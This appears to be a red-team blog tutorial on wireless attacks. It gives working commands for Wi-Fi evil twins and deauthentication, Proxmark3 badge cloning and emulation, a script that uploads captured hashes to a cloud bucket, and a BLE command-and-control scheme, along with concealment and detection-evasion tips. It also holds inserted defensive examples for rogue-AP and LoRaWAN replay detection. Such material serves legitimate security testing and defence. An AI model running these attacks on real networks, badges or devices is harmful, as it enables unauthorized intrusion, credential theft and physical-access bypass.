2026-06-18·network·9 min read·severity: high

Practical Wireless Exploitation for Red Teams

Tags: Wireless, Wi-Fi, BLE, RFID, IoT, Offensive Security, Red Teaming


The RF Attack Surface

Every wireless protocol is a perimeter you don't control. Wi-Fi bleeds through walls. Bluetooth pairs with devices in your target's pocket. RFID badges transmit credentials to readers you can emulate. IoT protocols run on firmware that hasn't been patched since the factory floor.

The red team's job is simple: find the signal, own the device, move laterally.


Wi-Fi

The 2.4 GHz vs 5 GHz Problem

Most corporate environments run dual-band, but the attack surface differs significantly:

  • 2.4 GHz: Longer range, better wall penetration. Your deauth frames reach further. More crowded = more targets, more noise, more cover.
  • 5 GHz: Shorter range, higher throughput. Enterprise APs love this band. Your reconnaissance window is smaller, but the targets are juicier.

📝 Operational Reality: In dense urban environments, 2.4 GHz is a warzone. Bring a directional antenna (e.g., Alfa AWUS036ACH with a panel antenna) to cut through the noise and hit specific floors from the street. However, modern corporate deployments prefer 5 GHz to avoid congestion. If you are targeting a high-rise, you need to account for signal polarization; window glass often attenuates vertically polarized signals. Tilt your antenna.


Evil Twin Operations

This isn't script-kiddie stuff with a Wi-Fi Pineapple and a captive portal. A proper evil twin operation requires precision.

Attack Chain:

  1. Reconnaissance: Passively identify the target SSID, BSSID, and channel. Note the security type (WPA2-PSK vs. WPA2-Enterprise) and verify if 802.11w (Management Frame Protection) is enabled—if it is, standard deauths are dead on arrival.

    ```bash
    airodump-ng wlan0mon --bssid <TARGET_BSSID> --channel <CH> --write capture
    ```

  2. Clone & Broadcast: Spin up a rogue AP matching the target's SSID and BSSID. Use hostapd-mana or EAPHammer for enterprise targets. Ensure your signal strength (RSSI) is at least 10dBm higher than the legitimate AP to trigger the sticky client behavior.

    ```bash
    # EAPHammer - Enterprise evil twin with integrated RADIUS
    ./eaphammer --interface wlan0 --essid "CorpNet" --channel 6 --auth wpa-eap --creds
    ```

  3. Forced Roaming: Send deauthentication frames to disconnect clients from the legitimate AP. They'll auto-reconnect to your stronger signal.

    ```bash
    aireplay-ng -0 10 -a <TARGET_BSSID> -c <CLIENT_MAC> wlan0mon
    ```

  4. Credential Harvesting:

    • WPA2-PSK: Capture the 4-way handshake. Crack offline.
    • WPA2-Enterprise: EAPHammer captures MSCHAPv2 challenge-response hashes. Relay or crack offline.
  5. Post-Exploitation: If you captured domain credentials, you've bypassed the perimeter without touching a phishing inbox.

⚠️ WARNING: Deauth storms are loud. In high-security environments, WIDS/WIPS will flag this immediately. Use targeted deauths against single clients, not broadcast storms. Better yet, don't deauth at all—position your rogue AP closer to the target than the legitimate AP and let 802.11k/v/r assisted roaming do the work.


Physical Concealment and Drop-Boxes

To capture handshakes from specific WPA3-SAE implementations or to conduct proximity-based attacks, you need to get inside the physical perimeter without physically entering the building.

📝 Operational Reality: Drop-Box Deployment

Field Scenario: Corporate Villa Infiltration

The target is a corporate office located in a converted villa with a private garden. The internal APs are mounted on interior walls, facing outward, but the signal degrades rapidly past the landscaping.

  1. The Implant: A battery-powered device (e.g., a Raspberry Pi Zero W or specialized ESP32-based implant) configured for passive monitoring and automated handshaking/PMKID capture.
  2. Concealment: You don't bury the device—you camouflage it. A common tactic involves a hollowed-out plastic rock or a modified solar-powered garden light. The device is placed in the flowerbed roughly 5 meters from the external wall, under the cover of darkness.
  3. Operational Security: The device is programmed with a cron job to only activate during business hours (08:00–18:00) to preserve battery and reduce detection windows. It stores captures locally and attempts to exfiltrate via a cellular LTE backhaul (using a purpose-built HAT) or by waiting for a passing operator to pull data via a hidden Wi-Fi P2P interface.
  4. Result: After 48 hours, the device has captured the PMKID for the "Corp-Guest" network and a full 4-way handshake for "Corp-Internal" from a maintenance staff member's tablet connecting near the window.

Cloud Exfiltration & Cracking

Cracking WPA2/PSK on a laptop is slow. Cracking it on a desktop is faster. Cracking it in the cloud is instant. The modern workflow bypasses local storage limitations entirely.

Attack Chain:

  1. Field Capture: Your drop-box or laptop captures the handshake/PMKID.
  2. Automated Exfiltration: A Python script immediately converts the .cap to hc22000 (hashcat format) and uploads it to a developer-cloud storage bucket (AWS S3, Azure Blob, or GCS) via a pre-authorized API token.
  3. Trigger & Spin-Up: A cloud function (AWS Lambda or Azure Function) detects the new file. It triggers an automation script (Terraform/Ansible) to spin up a GPU-optimized instance (e.g., AWS p3.2xlarge or Google n1-standard-4 with V100 GPUs) pre-loaded with the latest Hashcat and a massive rule set (OneRuleToRuleThemAll, best64).
  4. Distributed Cracking: The instance mounts the storage bucket, fires up Hashcat against the hash, and runs a targeted dictionary + mask attack.
  5. Notification: Once the plaintext key is recovered, it is written to a secured database, and the instance is auto-terminated to save costs. Your C2 dashboard notifies you: SSID: Corp-Admin | KEY: W3lc0meT0Th3Jungl3.

```python
import subprocess
import boto3

# Convert the capture to hashcat's 22000 format; fail loudly if the conversion does not succeed
subprocess.run(['hcxpcapngtool', '-o', 'hash.22000', 'capture.cap'], check=True)

# Upload the converted hash to the pre-authorized bucket for the cloud cracking pipeline
s3 = boto3.client('s3')
s3.upload_file('hash.22000', 'red-team-hash-bucket', 'target_xyz.22000')
```

WPA2/WPA3 Enterprise Attacks

WPA2-Enterprise (802.1X/EAP):

The beauty of enterprise Wi-Fi is that it integrates with Active Directory. The danger is that most implementations are misconfigured.

  • EAP-TTLS/PAP: Credentials sent in plaintext inside the TLS tunnel. Sniff and read.
  • PEAP-MSCHAPv2: Challenge-response captured. Crack with asleap or relay with ntlmrelayx.
  • EAP-TLS without client cert validation: Present any certificate. The AP won't verify it.

WPA3-Personal (SAE):

WPA3's Simultaneous Authentication of Equals (SAE) kills offline dictionary attacks. But Dragonblood (CVE-2019-9494, CVE-2019-9495) proved that side-channel leaks in the SAE handshake can recover the password.

📝 Operational Reality: Most enterprises haven't deployed WPA3 yet. When they do, watch for downgrade attacks—APs configured for WPA3/WPA2 transitional mode can be forced to WPA2, bringing back the 4-way handshake capture.


Rogue AP: The Insider Threat Vector

A Rogue AP isn't an evil twin—it's a physical device plugged into the corporate network. An employee brings a home router, plugs it into a conference room jack, and broadcasts "Linksys" for "convenience."

Why This Matters:

  • Bypasses NAC if the port isn't 802.1X-enabled.
  • Creates a bridge to the internal VLAN.
  • Often sits on the same broadcast domain as corporate assets.

Detection from the Outside: Look for SSIDs that don't match the corporate naming convention but share the same BSSID OUI as corporate hardware. Or better—walk the building with a Wi-Fi scanner and map unauthorized APs to physical locations.
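The two detections described here and in the evil-twin section above, written from the defender's side as an added example (not code from the original post): a WIDS-style pass over sensor output that flags a corporate SSID beaconed from an unmanaged BSSID, a non-corporate SSID coming from hardware with the corporate vendor's OUI, and per-transmitter deauth bursts, separating broadcast storms from targeted deauths. The AP inventory, OUI, SSID convention and sensor records are all constructed for the example.

```python
import re
from collections import defaultdict

# Constructed inventory for this example: the BSSIDs the enterprise operates, the
# OUI (first three octets) of its AP vendor, and its SSID naming convention.
AUTHORIZED_APS = {"00:11:22:aa:00:01": "Corp-Internal", "00:11:22:aa:00:02": "Corp-Guest"}
CORP_OUIS = {"00:11:22"}
CORP_SSID_RE = re.compile(r"^Corp-[A-Za-z]+$")
BROADCAST = "ff:ff:ff:ff:ff:ff"

def classify_beacons(beacons):
    """beacons: (bssid, ssid) pairs seen by a sensor -> (kind, bssid, ssid) findings."""
    corp_ssids = set(AUTHORIZED_APS.values())
    findings = []
    for bssid, ssid in beacons:
        bssid = bssid.lower()
        if bssid in AUTHORIZED_APS:
            continue                                       # managed radio, nothing to do
        if ssid in corp_ssids:
            findings.append(("evil-twin", bssid, ssid))     # our SSID from a radio we don't own
        elif bssid[:8] in CORP_OUIS and not CORP_SSID_RE.match(ssid):
            findings.append(("rogue-ap", bssid, ssid))      # our vendor's hardware, off-convention SSID
    return findings

def deauth_alerts(frames, window=10.0, threshold=5):
    """frames: (timestamp, transmitter, receiver) of deauth frames. Reports transmitters
    whose count in any `window` seconds reaches `threshold`, broadcast storm vs targeted."""
    per_src = defaultdict(list)
    for ts, src, dst in sorted(frames):
        per_src[src.lower()].append((ts, dst.lower()))
    alerts = []
    for src, events in per_src.items():
        peak, start = 0, 0
        for i, (ts, _) in enumerate(events):
            while ts - events[start][0] > window:          # slide the window forward
                start += 1
            peak = max(peak, i - start + 1)
        if peak >= threshold:
            receivers = {dst for _, dst in events}
            kind = "broadcast-storm" if BROADCAST in receivers else "targeted"
            alerts.append((src, kind, peak, len(receivers)))
    return alerts

# Constructed sensor output: a twin of Corp-Internal, an employee's home router on
# corporate-vendor hardware, and a neighbour that should not be flagged.
SAMPLE_BEACONS = [("00:11:22:aa:00:01", "Corp-Internal"), ("de:ad:be:ef:00:01", "Corp-Internal"),
                  ("00:11:22:bb:00:09", "Linksys"), ("66:77:88:00:00:01", "CafeWifi")]
# Twelve broadcast deauths in twelve seconds from the twin, one routine deauth from a real AP.
SAMPLE_DEAUTHS = [(float(t), "de:ad:be:ef:00:01", BROADCAST) for t in range(12)]
SAMPLE_DEAUTHS.append((3.5, "00:11:22:aa:00:01", "aa:aa:aa:00:00:01"))
```

A real AP sends the occasional deauth when it drops a client, so the threshold matters more than the presence of any single frame; the window and threshold here are illustrative and should be tuned per site.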


Bluetooth & BLE: The Forgotten Attack Surface

Classic Bluetooth vs BLE

| Feature | Classic Bluetooth | BLE |
| --- | --- | --- |
| Pairing | Secure Simple Pairing (SSP) | LE Secure Connections / LE Legacy |
| Security Model | Cryptographic key exchange | "Just Works" (no verification) |
| Attack Surface | PIN brute-force, legacy pairing | MITM, attribute reading, firmware dumping |

BLE is where the action is. Fitness trackers, smart locks, beacons, HID devices—they all run BLE, and most implement "Just Works" pairing because users hate pressing buttons.


BLE MITM & Sniffing

Hardware:

  • Ubertooth One: Classic Bluetooth sniffing, limited BLE support.
  • Nordic nRF52840 Dongle: Cheap, programmable, excellent for BLE recon and MITM.
  • Flipper Zero: Great for quick recon and basic attacks, but limited compared to a dedicated setup.

Attack Chain:

  1. Reconnaissance: Scan for BLE devices and services.
    ```bash
    bettercap -eval "ble.recon on"
    ```

  2. Enumerate GATT Services: Read characteristics, look for hardcoded credentials, device IDs, or firmware version strings that hint at known CVEs.
  3. MITM Setup: Use GATTacker or a custom nRF setup to sit between the device and its paired phone. If pairing uses "Just Works," you intercept the key exchange and decrypt traffic in real-time.
  4. Fuzzing & Exploitation: Once in the middle, fuzz GATT write characteristics. Smart locks and medical devices have fallen to simple buffer overflows in BLE handlers.

Real-World Impact:

  • Smart Locks: Capture the unlock command, replay it later. Or better—pair your own device because the lock accepts new pairings in "setup mode."
  • HID Keyboards: Inject keystrokes via BLE. If the target uses a BLE keyboard, you're one spoofed pairing away from a hardware implant.

Weaponizing BLE for C2

Standard RF attacks focus on data exfiltration, but BLE is an excellent covert channel for Command and Control (C2) on air-gapped or highly monitored systems.

The Attack Chain:

  1. The Implant: Malware is installed on a compromised workstation (or a server in a restricted zone).
  2. The Virtual Peripheral: The malware enumerates a virtual BLE dongle or utilizes the internal Intel Bluetooth radio. It advertises a specific, seemingly innocuous UUID (e.g., a generic "Fitness Tracker" service).
  3. The Hop: A red team operator (or a compromised mobile device inside the building) walks past the target machine. They scan for the UUID and connect.
  4. Data Transfer:
    • Tasking: The operator writes a specific value to a GATT characteristic. The malware reads this value as a command (e.g., 0x01 = "Dump LSASS memory to temp").
    • Exfil: The malware executes the command and writes the output (chunked) into a different GATT characteristic, which the operator reads.
  5. Cover: Traffic looks like standard BLE handshakes or device maintenance. It bypasses network IDS/IPS entirely because it never touches the Ethernet or Wi-Fi card.

Classic Bluetooth PIN Brute-Force

Legacy devices still use PIN-based pairing (0000, 1234). For devices with fixed PINs:

```bash
# Using bluez tools
hcitool scan           # Discover devices
sdptool browse <MAC>   # Enumerate services

# Brute-force PIN with tools like btcrack (for legacy pairing)
```

Pro Tip: Vehicle infotainment systems are goldmines. They pair with phones, store contact lists, and often run outdated Bluetooth stacks with known RCE vulnerabilities.


RFID & NFC: Cloning, Relaying, and Skimming

The RFID Spectrum

  • 125 kHz (LF): HID Prox, EM4100. No encryption. Trivial to clone.
  • 13.56 MHz (HF/NFC): Mifare Classic, Mifare DESFire, HID iCLASS. Mifare Classic uses Crypto-1 (broken). DESFire uses AES (secure if implemented correctly).
  • UHF (860-960 MHz): Supply chain, vehicle tracking. Often unencrypted, long-range readable.

Mifare Classic: The Gift That Keeps Giving

Mifare Classic cards are still deployed in access control systems worldwide despite Crypto-1 being broken for over a decade.

Attack Chain:

  1. Identify: Use a Proxmark3 or Flipper Zero to read the card's UID and determine the type.
    ```bash
    # Proxmark3
    hf search
    ```

  2. Dump: If it's Mifare Classic, recover the keys and dump all sectors.
    ```bash
    # Proxmark3 - automated key recovery and dump
    hf mf autopwn
    ```

  3. Clone: Write the dump to a blank Chinese Magic Card (UID writable).
    ```bash
    hf mf cload -f dump.bin
    ```

  4. Emulate: Use the Proxmark3 to emulate the card in real-time, bypassing physical possession requirements.
    ```bash
    hf mf sim --uid <TARGET_UID>
    ```

⚠️ WARNING: Mifare Classic's Crypto-1 is broken via the Darkside attack (offline) and Nested attack (requires one known key). If you have a valid reader, you can often recover all keys in under a minute.


NFC Relay Attacks

Relay attacks don't crack encryption—they extend it. Two attackers, one near the victim's card, one near the reader, bridge the communication in real-time.

Setup:

  • Attacker 1: Proxmark3 or Flipper Zero in sniff/relay mode, held near the victim's pocket/bag.
  • Attacker 2: Proxmark3 or custom antenna near the target reader.
  • Link: Low-latency connection (cellular, Wi-Fi, or dedicated radio) between the two devices.

The reader thinks the card is present. The transaction completes. The victim doesn't know it happened.

Defensive Note: This works against contactless payments, building access, and transit cards. The only defense is distance bounding (not implemented in most systems) or Faraday pouches.


HID Prox & LF RFID

125 kHz cards are the easiest target. No encryption, just a UID.

```bash
# Proxmark3 - read HID Prox card
lf hid read

# Clone to T5577 writable tag
lf hid clone -r <RAW_DATA>
```

📝 Operational Reality: Many buildings still use HID Prox. If you find one, you've found physical access. Period.


IoT & Proprietary Wireless: The Protocol Graveyard

Zigbee: Mesh of Doom

Zigbee networks use a network key for encryption. The problem? Many devices ship with default link keys (e.g., ZigBeeAlliance09), and if you capture the network join process, you recover the network key.

Attack Chain:

  1. Sniff Traffic: Use a CC2531 USB dongle with Zigbee2MQTT or a HackRF One to capture 2.4 GHz traffic.
  2. Capture Join: Wait for (or force) a device to join the network. The transport key is encrypted with the known link key.
  3. Decrypt: Recover the network key and decrypt all subsequent traffic.
  4. Inject: With the network key, craft malicious ZCL commands. Turn off alarms, unlock doors, or pivot to the IP network via the Zigbee gateway.

Case Study: Philips Hue (CVE-2020-6007). Compromise a single bulb via its Zigbee OTA update mechanism, push malware to the Hue bridge, and pivot to the home/corporate network. The bulb is your entry point.


Z-Wave: Downgrade to Disaster

Z-Wave S2 security uses ECDH key exchange. But if the controller accepts S0 devices, an attacker can force a downgrade during inclusion.

The Z-Shave Attack:

  1. Spoof an S0-capable device during pairing.
  2. The controller downgrades from S2 to S0.
  3. S0 encrypts the network key with static zeroes. Sniff and recover.
  4. Full network access achieved.

Target: Smart locks, garage door controllers, alarm systems. Once you have the network key, you control every device.


LoRaWAN: Long-Range, Long-Exposure

LoRa devices are deployed in agriculture, utilities, and smart cities—often in remote locations with no physical security.

Attack Vectors:

  • ABP (Activation by Personalisation): Static keys hardcoded in firmware. Extract firmware via JTAG/SWD, recover keys, impersonate the device.
  • OTAA Downgrade: Force a device to rejoin using ABP. If the device supports both, you can bypass OTAA's session key rotation.
  • Replay: If frame counters reset (device reset, battery swap), replay captured uplink messages. The server accepts them.

Hardware: HackRF One, LimeSDR, or a cheap LoRa module (RAK811, SX1276) with custom firmware.
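The frame-counter replay vector above, modelled from the network server's side as an added example (not code from the original post or from any LoRaWAN server product): a LoRaWAN 1.0.x-style FCntUp check that reconstructs the 32-bit counter from the 16 bits carried in the FHDR, rejects a non-increasing counter unless the device performs an OTAA rejoin, and shows how a relaxed counter setting (a constructed stand-in for the ABP-friendly option some servers expose) lets the reset-and-replay sequence through. MAX_FCNT_GAP is the specification default; MIC verification is not modelled.

```python
MAX_FCNT_GAP = 16_384   # LoRaWAN 1.0.x default: largest jump in FCntUp a server tolerates

class NetworkServerSession:
    """Network-server-side uplink counter state for one end device (constructed model)."""

    def __init__(self, relax_frame_counter=False):
        self.fcnt_up = None                  # last accepted 32-bit FCntUp, None after (re)join
        self.relax = relax_frame_counter     # the weak ABP setting that makes replay possible

    def on_join_accept(self):
        # OTAA rejoin derives fresh session keys, so a restart from 0 is legitimate here
        self.fcnt_up = None

    def _reconstruct(self, fcnt16):
        """The FHDR carries only the 16 LSBs; pick the MSBs giving the smallest value
        above the last accepted counter. On a real server the MIC, computed over the
        full 32-bit value, confirms this choice (not modelled here)."""
        if self.fcnt_up is None:
            return fcnt16
        full = (self.fcnt_up & 0xFFFF0000) | fcnt16
        if full <= self.fcnt_up:
            full += 0x10000                  # the 16-bit field wrapped since the last frame
        return full & 0xFFFFFFFF

    def accept_uplink(self, fcnt16):
        """Return (accepted, reason) for an uplink carrying FCnt `fcnt16`."""
        if not 0 <= fcnt16 <= 0xFFFF:
            raise ValueError("FCnt field is 16 bits")
        full = self._reconstruct(fcnt16)
        if self.fcnt_up is not None and full - self.fcnt_up > MAX_FCNT_GAP:
            if not self.relax:
                return False, "counter gap too large: replay or reset without rejoin"
            full = fcnt16                    # relaxed mode: trust the device's counter as sent
        self.fcnt_up = full
        return True, "accepted FCntUp=%d" % full


def replay_scenario(relax_frame_counter):
    """An ABP device sends FCnt 1..3, loses power and restarts at 0, then an attacker
    replays its captured FCnt=2 frame. Returns the server's accept decisions in order."""
    ns = NetworkServerSession(relax_frame_counter)
    decisions = [ns.accept_uplink(f)[0] for f in (1, 2, 3)]
    decisions.append(ns.accept_uplink(0)[0])   # device reset (battery swap)
    decisions.append(ns.accept_uplink(2)[0])   # replayed uplink
    return decisions
```

With strict checking the reset frame and the replay are both refused and the device stays offline until it rejoins; the relaxed setting restores connectivity for ABP devices that cannot rejoin, at the cost of accepting the replay.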


Infrared: The Invisible Vector

IR isn't dead. Conference room TVs, projectors, and industrial HVAC systems still use it. No encryption, no authentication.

Attack Chain:

  1. Capture IR signals with an IR receiver (TSOP38238 + Arduino/Raspberry Pi).
  2. Decode the protocol (NEC, RC5, RC6, Sony).
  3. Replay commands from a custom IR LED array.
  4. Turn off displays during presentations, change thermostat settings to trigger HVAC alerts, or disable projectors during critical meetings.

Red Team Value: Distraction, disruption, and social engineering cover. A malfunctioning conference room is a great pretext for "IT support" to enter a restricted area.


Hardware Toolkit

| Tool | Primary Use | Protocols |
| --- | --- | --- |
| Proxmark3 RDV4 | RFID/NFC cloning, emulation, sniffing | LF/HF RFID, NFC |
| Wi-Fi Pineapple Mark VII | Rogue AP, evil twin, captive portal | Wi-Fi 2.4/5 GHz |
| Ubertooth One | Bluetooth Classic sniffing | Bluetooth 2.0-3.0 |
| HackRF One | Wideband SDR, transmit/receive | Sub-GHz to 6 GHz |
| Flipper Zero | Quick recon, basic cloning, signal replay | RFID, NFC, Sub-GHz, IR, BLE |
| nRF52840 Dongle | BLE recon, MITM, GATT fuzzing | BLE 5.0 |
| Alfa AWUS036ACH | Wi-Fi monitoring, injection, long-range | Wi-Fi 2.4/5 GHz |

Operational Security Notes

  • RF Signature: Your attack hardware has a unique RF signature. In high-security environments, WIDS/WIPS may fingerprint your Alfa card or Proxmark3 transmissions. Use directional antennas to minimize broadcast footprint.
  • Legal Frequencies: Transmitting on licensed bands (cellular, emergency services) is illegal without authorization. Stick to ISM bands (2.4 GHz, 5 GHz, 915 MHz, etc.) unless you have explicit written permission.
  • Physical Presence: Wireless attacks often require proximity. Dress the part. A laptop in a coffee shop is normal. A directional antenna pointed at a building is not.
  • Logging: Assume everything you transmit is logged. Use throwaway hardware for high-risk ops. MAC address randomization is your friend.

Conclusion

Wireless is not a secondary, legacy threat vector—it is a live, critical bridge straight into the heart of corporate infrastructure. The physical security perimeter ends where the RF signal propagates, and as modern enterprises lock down their web perimeters and endpoints, the airwaves remain uniquely vulnerable, noisy, and often entirely unmonitored.

Bypassing physical security with camouflaged drop-boxes, routing data out over cellular links, or using Bluetooth for out-of-band Command and Control (C2) shows that the spectrum is limited only by an operator's creativity. Securing this space requires more than regular patching; it demands physical security awareness, active spectrum monitoring, and strict implementation of verified cryptographic standards.



About the author
Eye of Ra, Asbawy (Mohammed Al-Kasabi)

Red Team Consultant · Penetration Tester · Bug Bounty Hunter

Offensive security professional with 250+ vulnerabilities reported across 50+ organizations including Atlassian, Vimeo, and AT&T. Sharing research, tools, and field notes.
